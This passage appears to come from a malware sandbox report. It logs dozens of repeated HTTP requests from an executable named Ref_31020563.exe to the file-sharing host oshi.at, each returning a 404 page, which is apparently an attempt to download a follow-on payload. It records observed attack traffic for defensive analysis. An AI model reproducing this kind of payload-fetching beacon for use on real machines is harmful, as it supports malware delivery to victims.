                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          20 | 192.168.2.8 | 49736 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:23 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:24 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:24 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:24 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          21 | 192.168.2.8 | 49737 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:26 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:27 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:27 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:27 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          22 | 192.168.2.8 | 49738 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:29 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:30 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:30 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:30 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49739 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:32 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:28:33 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:28:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:28:33 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49740 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:35 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:28:36 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:28:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:28:36 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49741 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:38 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:28:39 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:28:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:28:39 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49742 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:41 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:28:42 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:28:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:28:42 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49743 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:44 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:28:45 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:28:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:28:45 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 49744 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:47 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:28:47 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:28:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:28:47 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 49745 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:49 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:28:51 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:28:51 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:28:51 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 49746 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:53 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:28:54 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:28:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:28:54 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.8 | 49747 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:56 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:28:57 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:28:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:28:57 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 49748 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:28:59 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:29:00 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:29:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:29:00 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 49749 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:29:02 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:29:03 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:29:03 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:29:03 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.8 | 49750 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:29:05 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:29:06 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:29:06 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:29:06 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.8 | 49751 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:29:08 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:29:09 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:29:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:29:09 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 49752 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:29:11 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:29:12 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:29:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:29:12 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 49753 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:29:14 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:29:15 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:29:15 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:29:15 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 49754 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:29:17 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:29:18 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:29:18 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:29:18 UTC | 1849 | IN |
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
39          192.168.2.8  49755        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:20 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:21 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:21 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:21 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
40          192.168.2.8  49756        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:23 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:24 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:24 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:24 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
41          192.168.2.8  49757        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:26 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:27 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:27 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:27 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
42          192.168.2.8  49758        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:29 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:30 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:29 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:30 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
43          192.168.2.8  49759        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:32 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:33 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:32 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:33 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
44          192.168.2.8  49760        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:35 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:36 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:35 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:36 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
45          192.168.2.8  49761        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:38 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:38 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:38 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:38 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.8  49762        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:40 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:41 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:41 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:41 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
47          192.168.2.8  49763        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:43 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:44 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:44 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:44 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
48          192.168.2.8  49764        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:46 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:47 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:47 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:47 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
49          192.168.2.8  49765        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:49 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:50 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:50 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:50 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
50          192.168.2.8  49766        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:52 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:53 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:53 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:53 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
51          192.168.2.8  49767        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:55 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:56 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:55 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:56 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
52          192.168.2.8  49768        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:29:58 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:29:59 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:29:58 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:29:59 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
53          192.168.2.8  49769        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:30:01 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:30:02 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:30:01 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:30:02 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
54          192.168.2.8  49770        194.15.112.248  443               7572  C:\Users\user\Desktop\Ref_31020563.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 15:30:04 UTC  37                 OUT        GET /AQBP HTTP/1.1
                                                       Host: oshi.at
2024-12-10 15:30:04 UTC  158                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx
                                                       Date: Tue, 10 Dec 2024 15:30:04 GMT
                                                       Content-Type: text/html;charset=UTF-8
                                                       Content-Length: 1849
                                                       Connection: close
2024-12-10 15:30:04 UTC  1849               IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          55 | 192.168.2.8 | 49771 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
